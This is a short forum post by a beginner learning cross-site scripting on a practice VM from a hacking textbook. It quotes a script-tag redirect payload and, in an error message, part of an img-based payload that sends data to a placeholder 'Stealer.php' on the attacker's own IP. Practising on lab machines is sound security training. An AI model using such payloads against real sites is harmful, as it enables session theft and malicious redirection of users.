Hi, this might be an easy question but here goes...I'm reading The Hacker Playbook v3 and I'm on XSS. I have "ChatSupportNode" Virtual Machine from THP v3 website. My problem is, none of the XSS scripts in the Book work. So how do I start each line? http://chat:xxxx<script>window.location = "[youtube]";</script> I'm not sure if I should use a "/" or "?" (or anything else) in between the end of the URL (http://chat:xxxx "/" or "?") Like I said an easy question but I'm just starting with XSS. I know I'm doing it wrong because none of them work. They're supposed to pop up a message or alert on the "chat:xxxx". Or redirect, etc...When I try using / or ? at the end it says: Cannot GET /chatchannel/1/%3Cscript%3Edocument.write('%3Cimg%20src=%22http://%3CYour%20IP%3E/Stealer.php So can anyone explain how to use XSS? What's an example including URL and XSS script. Then I can try more XSS testing. Please reply. Thanks
I'm back. I kinda figured it out. I guess you have to enter the script in a box, not one the URL? I don't know what I was thinking. The XSS is working on my ChatSupportSystems VM. Any other tips? I'm just getting started.